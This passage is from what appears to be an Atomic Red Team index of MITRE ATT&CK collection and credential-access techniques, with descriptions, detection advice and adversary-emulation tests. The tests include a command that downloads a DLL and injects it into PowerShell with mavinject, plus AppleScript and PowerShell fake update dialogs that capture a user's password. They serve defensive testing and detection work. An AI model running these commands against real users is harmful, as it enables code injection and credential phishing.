- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credential API Hooking
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:29:13.565Z'
- created: '2020-02-11T19:01:15.930Z'
- x_mitre_data_sources:
- - Windows event logs
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Binary file metadata
- - API monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
- identifier: T1056.004
- atomic_tests:
- - name: Hook PowerShell TLS Encrypt/Decrypt Messages
- auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
- description: 'Hooks functions in PowerShell to read TLS Communications
-
-'
- supported_platforms:
- - windows
- input_arguments:
- file_name:
- description: Dll To Inject
- type: Path
- default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
- server_name:
- description: TLS Server To Test Get Request
- type: Url
- default: https://www.example.com
- dependency_executor_name: powershell
- dependencies:
- - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
-
-'
- prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
- get_prereq_command: |
- New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}"
- executor:
- command: |
- mavinject $pid /INJECTRUNNING #{file_name}
- curl #{server_name}
- name: powershell
- elevation_required: true
- T1074:
- technique:
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
- description: |-
- Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
-
- In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
-
- Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: PWC Cloud Hopper April 2017
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-06-24T18:59:16.039Z'
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.2'
- atomic_tests: []
- T1530:
- technique:
- id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
- description: |-
- Adversaries may access data objects from improperly secured cloud storage.
-
- Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
-
- Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.
- name: Data from Cloud Storage Object
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - external_id: T1530
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1530
- - source_name: Amazon S3 Security, 2019
- url: https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/
- description: Amazon. (2019, May 17). How can I secure the files in my Amazon
- S3 bucket?. Retrieved October 4, 2019.
- - source_name: Microsoft Azure Storage Security, 2019
- url: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
- description: Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20).
- Azure Storage security guide. Retrieved October 4, 2019.
- - source_name: Google Cloud Storage Best Practices, 2019
- url: https://cloud.google.com/storage/docs/best-practices
- description: Google. (2019, September 16). Best practices for Cloud Storage.
- Retrieved October 4, 2019.
- - source_name: Trend Micro S3 Exposed PII, 2017
- url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
- description: Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed
- Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.
- - source_name: Wired Magecart S3 Buckets, 2019
- url: https://www.wired.com/story/magecart-amazon-cloud-hacks/
- description: 'Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker
- Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.'
- - source_name: HIPAA Journal S3 Breach, 2017
- url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/
- description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and
- Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-09T14:02:05.276Z'
- created: '2019-08-30T18:07:27.741Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - AWS
- - GCP
- - Azure
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Netskope
- - Praetorian
- x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
- service. Activity originating from unexpected sources may indicate improper
- permissions are set that is allowing access to data. Additionally, detecting
- failed attempts by a user for a certain object, followed by escalation of
- privileges by the same user, and access to the same object may be an indication
- of suspicious activity.
- x_mitre_data_sources:
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
- x_mitre_permissions_required:
- - User
- atomic_tests: []
- T1213:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1213
- url: https://attack.mitre.org/techniques/T1213
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- description: |-
- Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
-
- Adversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.
-
- The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
-
- * Policies, procedures, and standards
- * Physical / logical network diagrams
- * System architecture diagrams
- * Technical system documentation
- * Testing / development credentials
- * Work / project schedules
- * Source code snippets
- * Links to network shares and other internal resources
-
- Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.
- name: Data from Information Repositories
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-06-30T22:50:06.087Z'
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Praetorian
- - Milos Stojadinovic
- x_mitre_data_sources:
- - Azure activity logs
- - AWS CloudTrail logs
- - Stackdriver logs
- - OAuth audit logs
- - Application logs
- - Authentication logs
- - Data loss prevention
- - Third-party application logs
- x_mitre_detection: |-
- As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
-
- The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - SaaS
- - AWS
- - GCP
- - Azure
- - Office 365
- atomic_tests: []
- T1005:
- technique:
- created: '2017-05-31T21:30:20.537Z'
- modified: '2020-05-26T19:21:25.974Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1005
- external_id: T1005
- description: |
- Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
-
- Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
- name: Data from Local System
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to collect files from a system. Remote access tools with
- built-in features may interact directly with the Windows API to gather data.
- Data may also be acquired through Windows system management tools such as
- [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_system_requirements:
- - Privileges to access certain files and directories
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- atomic_tests: []
- T1039:
- technique:
- id: attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data from Network Shared Drive
- description: Adversaries may search network shares on computers they have compromised
- to find files of interest. Sensitive data can be collected from remote systems
- via shared network drives (host shared directory, network file server, etc.)
- that are accessible from the current system prior to Exfiltration. Interactive
- command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
- may be used to gather information.
- external_references:
- - source_name: mitre-attack
- external_id: T1039
- url: https://attack.mitre.org/techniques/T1039
- - external_id: CAPEC-639
- source_name: capec
- url: https://capec.mitre.org/data/definitions/639.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T15:42:44.026Z'
- created: '2017-05-31T21:30:41.022Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_system_requirements:
- - Privileges to access network shared drive
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to collect files from a network share. Remote access tools
- with built-in features may interact directly with the Windows API to gather
- data. Data may also be acquired through Windows system management tools such
- as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.2'
- atomic_tests: []
- T1025:
- technique:
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data from Removable Media
- description: "Adversaries may search connected removable media on computers
- they have compromised to find files of interest. Sensitive data can be collected
- from any removable media (optical disk drive, USB memory, etc.) connected
- to the compromised system prior to Exfiltration. Interactive command shells
- may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
- may be used to gather information. \n\nSome adversaries may also use [Automated
- Collection](https://attack.mitre.org/techniques/T1119) on removable media."
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T15:44:46.584Z'
- created: '2017-05-31T21:30:31.584Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_system_requirements:
- - Privileges to access removable media drive and files
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to collect files from a system's connected removable media.
- Remote access tools with built-in features may interact directly with the
- Windows API to gather data. Data may also be acquired through Windows system
- management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.1'
- atomic_tests: []
- T1114:
- technique:
- id: attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Email Collection
- description: 'Adversaries may target user email to collect sensitive information.
- Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
- external_references:
- - source_name: mitre-attack
- external_id: T1114
- url: https://attack.mitre.org/techniques/T1114
- - description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
- Retrieved October 8, 2019.
- url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T18:31:06.417Z'
- created: '2017-05-31T21:31:25.454Z'
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_is_subtechnique: false
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_detection: |-
- There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
-
- File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
-
- Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
-
- Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_data_sources:
- - Office 365 trace logs
- - Mail server
- - Email gateway
- - Authentication logs
- - File monitoring
- - Process monitoring
- - Process use of network
- x_mitre_version: '2.1'
- atomic_tests: []
- T1114.003:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1114.003
- url: https://attack.mitre.org/techniques/T1114/003
- - source_name: US-CERT TA18-068A 2018
- url: https://www.us-cert.gov/ncas/alerts/TA18-086A
- description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
- by Cyber Actors. Retrieved October 2, 2019.
- - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
- url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
- description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
- Retrieved October 8, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Email Forwarding Rule
- description: "Adversaries may setup email forwarding rules to collect sensitive
- information. Adversaries may abuse email-forwarding rules to monitor the activities
- of a victim, steal information, and further gain intelligence on the victim
- or the victim’s organization to use as part of further exploits or operations.(Citation:
- US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create
- inbox rules for various email functions, including forwarding to a different
- recipient. Messages can be forwarded to internal or external recipients, and
- there are no restrictions limiting the extent of this rule. Administrators
- may also create forwarding rules for user accounts with the same considerations
- and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)
- \n\nAny user or administrator within the organization (or adversary with valid
- credentials) can create rules to automatically forward all received messages
- to another recipient, forward emails to different locations based on the sender,
- and more."
- id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T18:29:48.994Z'
- created: '2020-02-19T18:54:47.103Z'
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
-
- Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_data_sources:
- - Process use of network
- - Process monitoring
- - Email gateway
- - Mail server
- - Office 365 trace logs
- x_mitre_platforms:
- - Office 365
- - Windows
- atomic_tests: []
- T1056.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1056.002
- url: https://attack.mitre.org/techniques/T1056/002
- - external_id: CAPEC-659
- source_name: capec
- url: https://capec.mitre.org/data/definitions/659.html
- - url: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
- description: Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits
- Mackeeper. Retrieved July 3, 2017.
- source_name: OSX Malware Exploits MacKeeper
- - source_name: LogRhythm Do You Trust Oct 2014
- url: https://logrhythm.com/blog/do-you-trust-your-computer/
- description: Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved
- December 17, 2018.
- - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
- description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware
- is hungry for credentials. Retrieved July 3, 2017.
- source_name: OSX Keydnap malware
- - source_name: Enigma Phishing for Credentials Jan 2015
- url: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
- description: 'Nelson, M. (2015, January 21). Phishing for Credentials: If
- you want it, just ask!. Retrieved December 17, 2018.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: GUI Input Capture
- description: "Adversaries may mimic common operating system GUI components to
- prompt users for credentials with a seemingly legitimate prompt. When programs
- are executed that need additional privileges than are present in the current
- user context, it is common for the operating system to prompt the user for
- proper credentials to authorize the elevated privileges for the task (ex:
- [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
- may mimic this functionality to prompt users for credentials with a seemingly
- legitimate prompt for a number of reasons that mimic normal usage, such as
- a fake installer requiring additional access or a fake malware removal suite.(Citation:
- OSX Malware Exploits MacKeeper) This type of prompt can be used to collect
- credentials via various languages such as AppleScript(Citation: LogRhythm
- Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation:
- LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials
- Jan 2015). "
- id: attack-pattern--a2029942-0a85-4947-b23c-ca434698171d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T20:56:14.853Z'
- created: '2020-02-11T18:58:45.908Z'
- x_mitre_contributors:
- - Matthew Molyett, @s1air, Cisco Talos
- x_mitre_data_sources:
- - PowerShell logs
- - User interface
- - Process command-line parameters
- - Process monitoring
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
-
- Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - macOS
- - Windows
- identifier: T1056.002
- atomic_tests:
- - name: AppleScript - Prompt User for Password
- auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
- description: |
- Prompt User for Password (Local Phishing)
- Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
- supported_platforms:
- - macos
- executor:
- command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
- app "System Preferences" to activate'' -e ''tell app "System Preferences"
- to display dialog "Software Update requires that you type your password
- to apply changes." & return & return default answer "" with icon 1 with
- hidden answer with title "Software Update"''
-
-'
- name: bash
- - name: PowerShell - Prompt User for Password
- auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
- description: |
- Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
-
- Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
- supported_platforms:
- - windows
- executor:
- command: "# Creates GUI to prompt for password. Expect long pause before prompt
- is available. \n$cred = $host.UI.PromptForCredential('Windows Security
- Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using
- write-warning to allow message to show on console as echo and other similar
- commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning
- $cred.GetNetworkCredential().Password\n"
- name: powershell
- T1056:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1056
- url: https://attack.mitre.org/techniques/T1056
- - external_id: CAPEC-569
- source_name: capec
- url: https://capec.mitre.org/data/definitions/569.html
- - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
